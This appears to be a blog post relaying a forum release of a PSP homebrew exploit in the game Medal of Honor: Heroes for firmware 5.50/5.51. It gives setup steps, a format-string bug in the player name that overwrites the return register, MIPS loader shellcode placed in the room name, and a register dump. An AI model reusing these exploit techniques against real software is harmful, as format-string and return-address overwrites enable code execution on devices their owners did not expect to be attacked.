Firmware 5.50 and 5.51 owners – don’t give up hope just yet, as a working exploit has been found in Medal of Honor: Heroes. (Just watch the youtube video above) This surfaced on the dcemu forums a few days ago. But like the other exploits this wasn’t thought to be of any use to us all. But unlike the others this one does work.

Thanks to kgsws˜™ for getting this far with a working exploit for 5.50 & 5.51 users.

Notes:

More info: Do not change room name to “lb” manually, use nitePR cheat to do it.

tested on: (and works)
- PSP-1000 (M33)
- PSP-3000 (CFW enabler)

EDIT:
It was tested on PSP-1000 with official firmware 5.51, it works.
It should work on PSP-3000 too.

*Sit back and watch the Medal of Honor: Heroes price soar on Ebay and Amazon….

Source: Dcemu

MOHH (1) exploit by kgsws

What you need:
- CFW PSP (can be far away, this exploit works over net)
- NON-CFW PSP
- WiFi net (both PSP)
for CFW-PSP:
- nitePR plugin
for NON-CFW PSP:
- MOHH (1) UMD

How to do it (CFW PSP):
- install nitePR
- copy ULUS-10141.txt to nitePR folder
- enable nitePR plugin
- run game, join infrastructure
- switch to “create server” section
- activate cheat “Room name run:ms0:/hx”
- start server
- before joining as player activate cheat “Player name run:ms0:/hx”
- wait for second player
- end

How to do it (NON-CFW PSP):
- copy file “hx” to memory stick root (you can copy entire ms0 folder)
- run MOHH (1)
- join infrastructure
- wait until CFW PSP create server
- join game called “lb”
- find first player
- aim at first player
- that should be all

For now it is untested on NON-CFW PSP, try it if you can …

Some info:

Player name is vulerable to format-string exploit.
You can’t have player name too long, format-string exploit is only way.
If you put exactly 880 characters in name (by format-string), next 4 characters will overwrite $ra register.
OK, 880 characters only for on-aim exploit.
Exploit code is stored in room name, new $ra points here.
Exploit code just load ms0:/hx.
Room name is also limited in size, you can put there only 35 characters (no ‘\0′).
I used old game registers to get loader working.
This trick is limited, it loads only 62064b to address 0×08E3227C, but it executes it from 0×08E3228C, that means first 4 instructions won’t be executed.
File ms0:/hx must be big, becouse of PSP’s cache, so when you compile your own, append some chars at end.
Same bug might be in MOHH 2, but not tested.

Room name code (addresses on execution):
#addr 0×08E32270
addi $a0, $a0, 0×626C # *path
#addr 0×08E32274
jal 0×08C92BE4
#addr 0×08E32278
li $a1, 0×0801 # flags (PSP_O_RDONLY | PSP_O_EXCL)
#addr 0×08E3227C
ori $a1, $ra, 0×227C
#addr 0×08E32280
andi $a2, $sp, 0xFFFF
#addr 0×08E32284
jal 0×08C92B94
#addr 0×08E32288
andi $a0, $v0, 0xFFFF
#addr 0×08E3228C
# ms0:
#addr 0×08E32290
# /hx

Registers on crash (new $ra):
zr:0×00000000 at:0×08C3BB58 v0:0×12000000 v1:0×08D10000
a0:0×08E2C020 a1:0×00000000 a2:0×08EC5BB0 a3:0×00003670
t0:0xD6000000 t1:0×47000000 t2:0×0046FFFE t3:0×08EC2540
t4:0×493F4000 t5:0×4A000000 t6:0×4B000000 t7:0×08D10000
s0:0×20202020 s1:0×20202020 s2:0×20202020 s3:0×46464646
s4:0×30464646 s5:0×08D923C0 s6:0×08D906A0 s7:0×00000002
t8:0×08D0BB80 t9:0×08D0BB80 k0:0×09FFFB00 k1:0×00000000
gp:0×08D4B440 sp:0×09FFF270 fp:0×00010000 ra:0×08E32270